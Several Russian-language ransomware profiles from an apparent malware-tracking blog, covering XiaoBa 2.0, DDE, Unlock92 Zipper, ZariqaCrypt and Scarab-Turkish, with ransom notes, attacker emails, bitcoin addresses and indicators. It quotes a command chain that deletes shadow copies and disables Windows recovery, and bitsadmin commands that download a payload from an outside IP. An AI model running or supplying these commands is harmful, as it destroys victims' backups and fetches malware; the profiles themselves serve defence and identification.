XiaoBa 2.0

XiaoBa 2.0 Ransomware

(шифровальщик-вымогатель)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES, а затем требует выкуп в 0.5 BTC, чтобы вернуть файлы. Оригинальное название: XIAOBA 2.0 Ransomware. На файле написано: что попало. Написан на языке FlyStudio. Фальш-копирайт: Adobe Systems Incorporated. Фальш-имя: Adobe Flash Player Installer/Uninstaller 30.0

© Генеалогия: XiaoBa > XiaoBa 2.0

К зашифрованным файлам добавляется расширение: .XIAOBA

Фактически используется составное расширение: .[xiaoba_666@163.com]Encrypted_(random id).XIAOBA

Примеры зашифрованных файлов:

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на начало июля 2018 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: HELP_SOS.hta
Содержит переводы на 20 языков. Первым открывается записка на китайском. 

Содержание записки о выкупе (на английском):
File Recovery Guide
You may have noticed that your file could not be opened and some software is not working properly. 
This is not wrong. Your file content still exists, but it is encrypted using "XIAOBA 2.0 Ransomware". 
The contents of your files are not lost and can be restored to their normal state by decryption. 
The only way to decrypt a file is to get our "RSA 4096 decryption key" and decrypt it using the key. 
Please enter 0.5 bitcoin into this address: 1DveXPhdwz69ttF8z2keJT2ux1onaDrzyb
Please contact E-Mail after completing the transaction: xiaoba_666@163.com
Send the file that needs to be decrypted to complete the decryption work
Using any other software that claims to recover your files may result in file corruption or destruction. 
You can decrypt a file for free to ensure that the software can recover all your files. 
Please find someone familiar with your computer to help you
You can find the same guide named "HELP_SOS.hta" next to the encrypted file. 

Содержание записки о выкупе (на русском):
Руководство по восстановлению файлов 
Возможно, вы заметили, что ваш файл не может быть открыт, а некоторое программное обеспечение работает неправильно. 
Это не так. Содержимое вашего файла все еще существует, но оно зашифровывается с помощью «XIAOBA 2.0 Ransomware» . 
Содержимое ваших файлов не будет потеряно и может быть восстановлено до нормального состояния путем дешифрования. 
Единственный способ расшифровать файл - получить наш «ключ расшифровки RSA 4096»  и расшифровать его с помощью ключа. 
Введите 0.5 биткойн в этот адрес: 1DveXPhdwz69ttF8z2keJT2ux1onaDrzyb  
Пожалуйста, свяжитесь с E-Mail после завершения транзакции: xiaoba_666@163.com  
Отправьте файл, который необходимо дешифровать, чтобы завершить работу по расшифровке 
Использование любого другого программного обеспечения, требующего восстановления ваших файлов, может привести к повреждению или уничтожению файлов. 
Вы можете бесплатно расшифровать файл, чтобы программное обеспечение могло восстановить все ваши файлы. 
Найдите кого-то знакомого с вашим компьютером, чтобы помочь вам 
Рядом с зашифрованным файлом вы можете найти тот же справочник с именем «HELP_SOS.hta». 

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Удаляет теневые копии файлов, отключает функции восстановления и исправления Windows на этапе загрузки, а затем выключает компьютер, используя команды: 
/c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

➤ Исходное имя зашифрованного файла хранится между файловыми маркерами "XIAOBA". Смотрите скриншот. 

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
HELP_SOS.hta
HELP_SOS.vbs
install_flash_player.bin.exe

svchost.exe
<random>.exe - случайное название

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
%TEMP%\HELP_SOS.hta
%TEMP%\HELP_SOS.vbs

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: xiaoba_666@163.com
BTC: 1DveXPhdwz69ttF8z2keJT2ux1onaDrzyb
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

XiaoBa Ransomware
XiaoBa 2.0 Ransomware

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

См. выше историю семейства. 


Обновление от 26 июля 2018:
По данным, предоставленным Майклом Джиллеспи, вымогатели также участвуют в распространении GlobeImposter-2. На скриншотах ниже можно видеть, что email и BTC совпадают. 

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet 
 ID Ransomware (ID as XiaoBa 2.0)
 Write-up, Topic of Support
 * 

 Thanks: 
 Rony, Michael Gillespie
 Andrew Ivanov
 *
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.

DDE

DDE Ransomware

(шифровальщик-вымогатель)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей, а затем предлагает заплатить выкуп и связаться по email, чтобы вернуть файлы. Также сообщается, что ключ дешифрования можно найти самому. Оригинальное название: DDE Ransomware. На файле написано: dde_ransomware.exe.

© Генеалогия: Crypt888 и другие >> DDE 

К зашифрованным файлам добавляется расширение: .encrypted


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на вторую половину июля 2018 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Запиской с требованием выкупа выступает изображение, заменяющее обои Рабочего стола и маленькое диалоговое окно, в котором предлагается самостоятельно найти ключ дешифрования.

Содержание текста о выкупе:
YOU ARE HACKED
ALL YOUR PERSONAL FILES HAVE BEEN ENCRYPTED!
IF YOU WANT RESTORE YOUR DATA YOU HAVE TO PAY!
CONTACT US: no-reply@gmail.com
BUT! YOU CAN RESTORE YOUR DATA WITHOUT
OUR DECRYPTOR! :)))))

Перевод текста на русский язык:
ВЫ ВЗЛОМАНЫ
ВСЕ ВАШИ ЛИЧНЫЕ ФАЙЛЫ БЫЛИ ЗАШИФРОВАНЫ!
ЕСЛИ ВЫ ХОТИТЕ ВОССТАНОВИТЬ СВОИ ДАННЫЕ, ВАМ ПРИДЕТСЯ ПЛАТИТЬ!
СВЯЖИТЕСЬ С НАМИ: no-reply@gmail.com
НО! ВЫ МОЖЕТЕ ВОССТАНОВИТЬ СВОИ ДАННЫЕ БЕЗ
НАШ ДЕШИФРАТОРА! :)))))

Содержание текста из окна с заголовком HACKER:
Your important files are encrypted.
If you need them, You can find my KEY to decrypt.
GOOD LUCK!!!

Перевод текста на русский язык:
Ваши важные файлы зашифрованы.
Если они вам нужны, вы можете найти мой ключ для расшифровки.
УДАЧИ!!!

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ DDE использует BITS (службу фоновой интеллектуальной передачи данных Windows, Background Intelligent Transfer Service) для загрузки вредоносов на ПК и установки изображения на обои с помощью команд:
cmd.exe /c bitsadmin /transfer CR /priority foreground http://203.162.130.73/a.zip %ALLUSERSPROFILE%\img.jpg > %TEMP%\a.txt
bitsadmin.exe bitsadmin /transfer CR /priority foreground http://203.162.130.73/a.zip %ALLUSERSPROFILE%\img.jpg

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
dde_ransomware.exe
bitsadmin.exe
img.jpg
a.zip
a.txt
<random>.exe - случайное название

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->
%TEMP%\a.txt
%ALLUSERSPROFILE%\img.jpg

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
xxxx://203.162.130.73/a.zip
xxxx://192.168.56.152:2869/upnphost/udhisapi.dll?content=uuid:4f8e1a2d-3fec-4a15-86de-6f8fafe83a56
xxxx://[fe80::c8c7:a44f:142b:cf30]:2869/upnphost/udhisapi.dll?content=uuid:4f8e1a2d-3fec-4a15-86de-6f8fafe83a56
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>

Степень распространённости: низкая.
Подробные сведения собираются регулярно.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet 
 ID Ransomware (ID as )
 Write-up, Topic of Support
 * 

 Thanks: 
 CyberSecurity GrujaRS
 Andrew Ivanov
 *
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.

Unlock92 Zipper

Unlock92 Zipper Ransomware

(шифровальщик-вымогатель, zip-вымогатель)
Translation into English

Этот крипто-вымогатель помещает файлы в zip-архив с паролем, а затем требует написать на email, чтобы узнать как вернуть файлы. Оригинальное название: не указано. На файле написано: Arch.exe или что попало.
---

Обнаружения: 

DrWeb -> Trojan.Encoder.5035

ALYac -> Trojan.Ransom.Unlock92

BitDefender -> Gen:Variant.Ransom.Unlock92.24

ESET-NOD32 -> MSIL/Filecoder.OD

Malwarebytes -> Ransom.FileCryptor

Symantec -> Trojan.Gen.2

Tencent -> Win32.Trojan.Raas.Auto

TrendMicro -> Ransom_ZIPPER.THGBOAH

---

© Генеалогия:  Unlock92, Unlock92 2.0 > Unlock92 Zipper

Изображение - логотип статьи.

К помещенным в архив файлам добавляется расширение .zip
Название архива даётся по шаблону: <foldername>-<random{5}>.zip

По-русски: <имя_папки>-<случайные_5_строчных_букв>.zip
Пример: Мои документы-dcohk.zip или My documents-dcohk.zip

На скриншоте показано содержимое директории и архива

Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на вторую половину июля 2018 г. Ориентирован на русскоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется по шаблону с 20-ю случайными строчными английскими буквами: <random_20_lowercase_letters>.txt

В представленном примере было следующее: xjmjvepoylkesviyxmhn.txt

Содержание записки о выкупе:
Если хотите вернуть ваши файлы отправьте один небольшой архив и файл KEY.VL на e-mail: un92@protonmail.com
Если вы не получили ответа в течение суток то скачайте с сайта www.torproject.con браузер  TOR 
и с его помощью зайдите на сайт: http://n3r2kuzhw2h7x6j5.onion  -  там будет указан действующий почтовый ящик. 
Пароль для архива состоит более чем из 50 символов. На самостоятельный подбор уйдёт не один год.

Перевод записки на английский язык:
If you want to return your files, send one small archive and file KEY.VL to e-mail: un92@protonmail.com
If you did not receive an answer within 24 hours then download the TOR browser from www.torproject.con
and with his help go to the site: http://n3r2kuzhw2h7x6j5.onion - there will be a valid mailbox.
The password for the archive consists of more than 50 characters. On an independent selection will take more than one year.

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Так как вымогатели в этой версии используют email из предыдущих версий - un92@protonmail.com, то сервис IDR использует некоторые другие правила, чтобы отличить Unlock92 Zipper от других вариантов.

➤ Вместо шифрования помещает все файлы в папке в один защищенный паролем массивный zip-файл, а затем перезаписывает содержимое каждого файла всего на один 0x00 байт.

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
xjmjvepoylkesviyxmhn.txt
KEY.VL - содержит пароль, зашифрованный с помощью RSA
Arch.exe
<random>.exe - случайное название

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->


Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: un92@protonmail.com
Tor-URL: xxxx://n3r2kuzhw2h7x6j5.onion
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание!
Файлы можно вернуть!
Рекомендую обратиться по этой ссылке к Майклу Джиллеспи >>

Attention!
Files can be returned!
I recommend getting help with this link to Michael Gillespie >>

 Read to links: 
 Tweet on Twitter + Tweet
 ID Ransomware (ID as Unlock92 Zipper)
 Write-up, Topic of Support
 * 

 Thanks: 
 Michael Gillespie
 Andrew Ivanov
 *
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.

ZariqaCrypt

ZariqaCrypt Ransomware

(шифровальщик-вымогатель)
Translation into English

Этот крипто-вымогатель шифрует данные пользователей, а затем требует написать на email вымогателей, чтобы узнать, как заплатить выкуп и вернуть файлы. Оригинальное название: не указано. На файле написано: нет данных.

© Генеалогия: выясняется, явное родство с кем-то не доказано.

К зашифрованным файлам добавляется цифровой ряд и расширение: .crypt

Примеры зашифрованных файлов: 
***bart.png.36921.crypt
***maggie.png.36412.crypt


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на конец августа 2018 г. Ориентирован на англоязычных пользователей, что не мешает распространять его по всему миру.

Записка с требованием выкупа называется: DECRYPT.txt

Содержание записки о выкупе:
Hello. Your files have been encrypted due to a security problem with your PC. 
If you want to restore them, write ID:[redacted 7 numbers] to the mail zariqa@protonmail.com 

Перевод записки на русский язык:
Привет. Ваши файлы зашифрованы из-за проблемы безопасности вашего ПК.
Если хотите их вернуть, напишите ID:XXXXXXX на почту zariqa@protonmail.com

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


➤ Оставляет 12-ти байтный маркер файла в начале зашифрованного файла. 

Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
DECRYPT.txt
<random>.dll
<random>.exe - случайное название

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
См. ниже в обновлениях другие адреса и контакты.
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>


Степень распространённости: низкая.
Подробные сведения собираются регулярно.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

 Read to links: 
 Tweet on Twitter + Tweet 
 ID Ransomware (ID as ZariqaCrypt)
 Write-up, Topic of Support
 * 

 Thanks: 
 Michael Gillespie
 muhammadv (victim in the topics of support)
 Andrew Ivanov
 *

© Amigo-A (Andrew Ivanov): All blog articles.

Scarab-Turkish

Scarab-Turkish Ransomware

(шифровальщик-вымогатель) (первоисточник)

Translation into English

Этот крипто-вымогатель шифрует данные пользователей с помощью AES, а затем требует выкуп в # BTC, чтобы вернуть файлы. Оригинальное название: не указано. На файле написано: нет данных. Написан на Delphi.

© Генеалогия: Scarab >> Scarab Family > {update encryptor} >  Scarab-Turkish

Это изображение — логотип статьи. Изображает скарабея и флаг Турции.

This image is the logo of the article. It depicts a scarab with a flag of Turkey.

К зашифрованным файлам добавляется расширение: .[firmabilgileri@bk.ru]

Используется шаблон для расширения: .[email]

Файлы не переименовываются. Пример зашифрованных файлов:
Instruct.xml.[firmabilgileri@bk.ru]
My_documents.doc.[firmabilgileri@bk.ru]


Внимание! Новые расширения, email и тексты о выкупе можно найти в конце статьи, в обновлениях. Там могут быть различия с первоначальным вариантом. 


Активность этого крипто-вымогателя пришлась на начало июля 2018 г. Ориентирован на турецких пользователей, но они вряд ли поймут текст, в котором турецкие буквы заменены на английские. 

✋ Вымогатели по ошибке пропустили текст через блокнот Windows, в которой не было поддержки турецкого языка. В результате этого специальные турецкие буквы были заменены английскими. Корректно перевести эту мешанину непросто. Там нет никаких данных, только рассуждения. 

Записка с требованием выкупа называется: HOW TO RECOVER ENCRYPTED FILES.TXT

Содержание записки о выкупе:
SISTEMINIZDEKI DEGER GORULEN VERILERIN TUMU TARAFIMCA SIFRELENMISTIR.
VERILERINIZI GERI ALMAK ICIN ASAGIDA SIZE YAZDIGIM MAIL ADRESINDEN BANA ULASABILIRSINIZ.
BANA MAIL ADRESINIZDE IP ADRESINIZI GONDERMEYI UNUTMAYIN. 
firmabilgileri@bk.ru
BUNUN YANINDA;
GENELDE SERVERINA GIRDIGIMIZ MUSTERILERIN TEREDDUTLERI ODEME YAPTIKTAN SONRA DOSYALARIMIZ GELMESSE KOMSUMUZ HACKLENDI DOSYALARI ACILMADI
EKSIK ACILDI VS. VS. VS. MALESEF SON ZAMANLARDA BU YAPTIGIMIZ ISIN TRENDLESMESI SONUCU BU TARZ SEREFSIZLIKLER YAPAN VAR PEKI BANA NASIL GUVENECEKSINIZ
SU SEKILDE BELIRTEYIM DAHA ONCE HACKLEDIGIM BIR FIRMAYI REFERANS AMACLI SOYLEYEBILIRIM ARAR SORARSINIZ 
BIR DIGER KONUYA GELIRSEK
YAPTIGIMIZ SIFRELEMEYI BIZDEN BASKA ACABILEN YOK SAGA SOLA GONDERIYORSUNUZ SERVERLARI ADAMLAR SIZDEN ALACAGIMIZ RAKAMINDA USTUNE RAKAM EKLEYEREK
KENDILERI SIFRELERI COZMUS GIBI ISINIZI GORUYORLAR BIRCOK VERI KURTARMA FIRMASIYLADA CALISYORUZ, CALISYORUZ DERKEN ORTAKLIK VS. DEGIL SIZIN ONLARA GONDERDIGINIZ
SERVERLARIN SIFRELERINI SIZE DEGIL AYNI RAKAMA ONLARA VERIYORUZ ONLARDA KARLARINI EKLEYEREK SIZE VERI KURTARMA HIZMETINI VERMIS OLUYOR
BIR DIGER KONU LUTFEN SAAT 10:00'A KADAR DONMUS OLUN BUNUN NEDENLERINE GELIRSEK
GERCEKTEN COK YOGUN BIR TEMPO ILE CALISYORUZ BIZIM ICIN VAKIT SIZIN YAPACAGINIZ ODEMEDENDE ONEMLI BIR SONRAKI GUNUN SERVERLARININ HAZIRLANMASI SIFRELENMESI
BIZDE NETICEDE INSANIZ UYKU YEMEK SOSYAL AKTIVITELER DERKEN VAKTIMIZ KALMIYOR ELIMIZDE ONLARCA IS VARKEN GERIYE DONUP 1 ISLE UGRASAMIYORUZ SIFRELEDIGIMIZ VERILERIN
SIFRELERI 1234 KOYACAK KADAR AMATOR DEGILIZ YADA DATALARI RECOVERY PROGRAMLARI, SHADOW EXPLORER ILE KURTARACAGINIZ BIR SEKILDE BIRAKMIYORUZ YANI OYALANMANIN SAGA SOLA
SORMANIN BIR MANASI YOK VAKITLICE DONUN HERKES VAKITLICE ISINI YAPSIN 
BIR DIGER KONU SAVCILIGA GIDECEK ARKADASLAR ICIN BU KISIM 
BANKA HESAP NUMARASI ISTEYIP DURMAYN CUNKU BANKA HESABI KULLANMIYOR ODEMELERI BITCOIN ILE ALIYORUZ.
BIR DIGER KONU NE OLUR BU ISI 3 GUNDUR YAPIYORUM MUAMELESI YAPMAYIN BANA 5 YILDIR BU ISI YAPIYORUM 5 YILDIR KIMSE YAKALAYAMADI
SENMI YAKALAYACAKSIN BIR AKILLI SENMISIN ? HA YINE ISTEDIGIN KADAR UGRASABILIRSINIZ AMA LUTFEN BUNU BENI MESGUL EDEREK YAPMAYIN...
ODEMEDEN SONRA VERILECEK HIZMETLER
+SIFRELI DOSYALARI COZME
+ACIKLARINIZ HAKKINDA BILGILENDIRME (DISARDA FIZIKSEL YEDEGI OLUP ACIGI OGRENMEK ICIN YAZAN ARKADASLAR ODEME ALMDAN ANLATMIYORUZ)
DIPNOT: VAKIT VAKIT VAKIT EN ONEMLI SEY VAKIT SAAT 10 DEN ONCE DONUN.
Your personal identifier:
6A02000000000000***F5DED3F
firmabilgileri@bk.ru

Перевод записки на русский язык:

ВСЕ ВАШИ ЦЕННЫЕ ДАННЫЕ В ВАШЕЙ СИСТЕМЕ ЗАШИФРОВАНЫ МНОЙ.

ЧТОБЫ ВЕРНУТЬ ДАННЫЕ, ВЫ МОЖЕТЕ СВЯЗАТЬСЯ СО МНОЙ ПО EMAIL-АДРЕСУ, КОТОРЫЙ Я ВАМ НАПИСАЛ.

НЕ ЗАБУДЬТЕ ОТПРАВИТЬ МНЕ ВАШ IP-АДРЕС НА МОЙ EMAIL-АДРЕС 

firmabilgileri@bk.ru

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Your personal identifier:
6A02000000000000***F5DED3F
firmabilgileri@bk.ru

Технические детали

Может распространяться путём взлома через незащищенную конфигурацию RDP, с помощью email-спама и вредоносных вложений, обманных загрузок, ботнетов, эксплойтов, веб-инжектов, фальшивых обновлений, перепакованных и заражённых инсталляторов. См. также "Основные способы распространения криптовымогателей" на вводной странице блога.

Если вы пренебрегаете комплексной антивирусной защитой класса Internet Security или Total Security, то хотя бы делайте резервное копирование важных файлов по методу 3-2-1. 


Список файловых расширений, подвергающихся шифрованию:
Это документы MS Office, OpenOffice, PDF, текстовые файлы, базы данных, фотографии, музыка, видео, файлы образов, архивы и пр.

Файлы, связанные с этим Ransomware:
HOW TO RECOVER ENCRYPTED FILES.TXT
<random>.exe - случайное название

Расположения:
\Desktop\ ->
\User_folders\ ->
\%TEMP%\ ->

Записи реестра, связанные с этим Ransomware:
См. ниже результаты анализов.

Сетевые подключения и связи:
Email: firmabilgileri@bk.ru
См. ниже результаты анализов.

Результаты анализов:
Ⓗ Hybrid анализ >>
𝚺  VirusTotal анализ >>
🐞 Intezer анализ >>
Ⓥ VirusBay образец >>
ⴵ  VMRay анализ >>
ᕒ  ANY.RUN анализ >>
👽 AlienVault анализ >>
🔃 CAPE Sandbox анализ >>
⨇ MalShare анализ >>
⟲ JOE Sandbox анализ >>

Степень распространённости: низкая.
Подробные сведения собираются регулярно.

---

=== ИСТОРИЯ СЕМЕЙСТВА === HISTORY OF FAMILY ===

Scarab Family (семейство Scarab):
Scarab (ScarabLocker) - июнь-август 2017, ноябрь 2017
Scarab-Scorpio (Scorpio) - июль 2017
Scarab-Jackie - октябрь 2017
Scarab-Russian (Scarabey) - декабрь 2017
Scarab-Decrypts - март 2018
Scarab-Crypto - март 2018
Scarab-Amnesia - март 2018
Scarab-Please - март 2018
Scarab-XTBL - апрель 2018
Scarab-Oblivion - апрель 2018
Scarab-Horsia - май 2018
Scarab-Walker - май 2018
Scarab-Osk - май 2018 
Scarab-Rebus - май 2018 
Scarab-DiskDoctor - июнь 2018
Scarab-Danger - июнь 2018
Scarab-Crypt000 - июнь 2018
Scarab-Bitcoin - июнь 2018
Scarab-Bomber - июнь 2018
Scarab-Omerta - июнь-июль 2018
Scarab-Bin - июль 2018
Scarab-Recovery - июль 2018
Scarab-Turkish - июль 2018
Scarab-Barracuda - июль 2018
Scarab-CyberGod - август 2018
и другие варианты. 

---

=== БЛОК ОБНОВЛЕНИЙ === BLOCK OF UPDATES ===

➤ См. выше Историю семейства. 


Обновление от 27 сентября 2018:
Расширение: .firmabilgileri
Записка: benioku.txt
Email: datastore2018@mail.ru

➤ Содержание записки:
Tum Dosyalariniz Sifrelenmistir!
Serverinizde bulunan bir guvenlik acigindan faydalanarak serverinize girdim ve kayda deger buldugum bilgilerinizi Sifrelemis Bulunmaktayim!
Verilerinizi geriye buldugum sekilde koymami isterseniz bunun sartlari konusunda anlasmak uzere bana datastore2018@mail.ru adresine saat 10:00 a kadar serverinizin ip numarasini da iceren bir mail atiniz kosullar 
konusunda anlasalim. Saat 10:00 dan sonra donuslerle ilgilenmiyorum!!!!
+ Para Verseniz Daha Acmazlar Diyen Bilgisayarcilara ( Ozellikle Bu Aciga Neden Olmalarina Ragmen piskin piskin 300 500 TL Format ve Programlarin Kurulum Parasi isterler) ve ya Parani Alir Dosyalarini Vermez 
Diyen Etrafinizdaki insanlara inanmayin! 
 Dikkatinizi Cekmek Istedigimiz Bazi Hususlar Var!
+ Size Guven Verecek Yeterli Referansa Sahibim Daha Цnce Hackledi?im Bir Firmayy Arayarak Dosyalari Aзip Aзmadigimi Sorabilirsiniz
+ Aciklarinizi Kapatarak Bir Daha B?yle Bir Olay Yasamamaniz icin Gerekli Guvenlik Tedbirlerini Anlatirim. 
+ Sizi tanimiyorum, dolayisi ile size karsi kotu duygular beslememin size kotuluk yapmamin bir anlami da yok, amacim sadece bu isten bir gelir elde etmek. 
Yaptiginiz odeme sonrasinda en kisa zamanda verilerinizi eski haline getirmek icin sunucunuza baglanacagim. 
+ Benimle iletisime gecmek icin asagidaki email adresini kullanin, datastore2018@mail.ru
=> Eger odeme yaparsaniz dosyalarinizi otomoatik olarak cozecek bir yazilim gonderecegim.
=> Eger odeme yapmazsaniz dosyalariniz sonsuza dek sifreli kalacak.
=> Asagidaki hususlara dikkat edin! <=
Internette buldugunuz ucretsiz araclari denemeyin, dosyalarinizi tamamen bozabilirsiniz. 
Lutfen dosyalariniza bilincsiz mudahalelerde bulunmayin ve bilgisi olmayan kimseye bilgisayarinizi vermeyin. 
Her kullanicinin benzersiz bir sifreleme anahtari oldugu icin diger kullanicilarin sifre cozuculeri verilerinizle uyumlu degildir. 
6A020000000000000***ADFEF0F 

---

=== БЛОК ССЫЛОК и СПАСИБОК = BLOCK OF LINKS AND THANKS ===

Внимание!
Файлы в некоторых случаях можно дешифровать!
Изучите моё руководство в статье SCARAB DECODER
*
*

 Read to links: 
 Tweet on Twitter + Tweet 
 ID Ransomware (ID as Scarab)
 Write-up, Topic of Support
 * 

 Thanks: 
 Emmanuel_ADC-Soft, Michael Gillespie
 Andrew Ivanov
 *
 *
 

© Amigo-A (Andrew Ivanov): All blog articles.